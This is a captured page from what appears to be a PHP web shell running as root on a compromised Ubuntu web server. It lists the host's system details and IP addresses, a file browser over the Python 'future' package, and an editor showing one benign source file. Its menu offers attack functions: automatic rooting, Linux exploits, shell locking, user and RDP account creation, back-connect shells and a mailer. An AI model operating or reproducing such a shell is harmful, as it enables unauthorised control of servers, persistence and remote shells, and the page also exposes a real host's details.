Linux vmi284606.contaboserver.net 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64
Apache/2.4.57 (Ubuntu)
: 167.86.127.34 | : 216.73.217.31
Cant Read [ /etc/named.conf ]
7.2.24-0ubuntu0.18.04.17
root
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
lib /
python3 /
dist-packages /
future /
types /
[ HOME SHELL ]
Name
Size
Permission
Action
__pycache__
[ DIR ]
drwxr-xr-x
__init__.py
6.68
KB
-rw-r--r--
newbytes.py
14.56
KB
-rw-r--r--
newdict.py
3.04
KB
-rw-r--r--
newint.py
12.92
KB
-rw-r--r--
newlist.py
2.23
KB
-rw-r--r--
newmemoryview.py
654
B
-rw-r--r--
newobject.py
3.65
KB
-rw-r--r--
newopen.py
811
B
-rw-r--r--
newrange.py
4.92
KB
-rw-r--r--
newstr.py
14.83
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : newmemoryview.py
""" A pretty lame implementation of a memoryview object for Python 2.6. """ from collections import Iterable from numbers import Integral import string from future.utils import istext, isbytes, PY3, with_metaclass from future.types import no, issubset # class BaseNewBytes(type): # def __instancecheck__(cls, instance): # return isinstance(instance, _builtin_bytes) class newmemoryview(object): # with_metaclass(BaseNewBytes, _builtin_bytes)): """ A pretty lame backport of the Python 2.7 and Python 3.x memoryviewview object to Py2.6. """ def __init__(self, obj): return obj __all__ = ['newmemoryview']
Close